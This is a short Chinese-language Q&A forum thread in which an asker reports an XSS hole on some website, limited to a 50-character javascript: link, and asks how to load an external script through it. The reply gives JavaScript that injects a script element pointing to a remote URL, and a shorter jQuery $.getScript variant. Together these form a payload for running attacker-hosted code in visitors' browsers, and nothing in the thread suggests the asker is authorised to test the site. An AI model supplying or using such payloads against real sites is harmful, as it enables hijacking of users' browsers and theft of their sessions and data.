你能在 javascript 中添加脚本的源代码吗

我在一个网站上发现了一个 xss 漏洞，但它只允许<a href=javascript:alert(1)>. 问题是它只接受 50 个字符。我的问题：我可以从获取脚本的地方以类似的方式添加源代码吗？javascript:script.src=and here the source of my code

烙印99

浏览 133回答 1

1回答

PIPIONE

有人可以像这样加载外部脚本，但它有 50 多个字符 let s = document.createElement("script"); s.src = "url"; document.head.appendChild(s);如果你有 JQuery，代码会更小： $.getScript("url");

0 0

随时随地看视频慕课网APP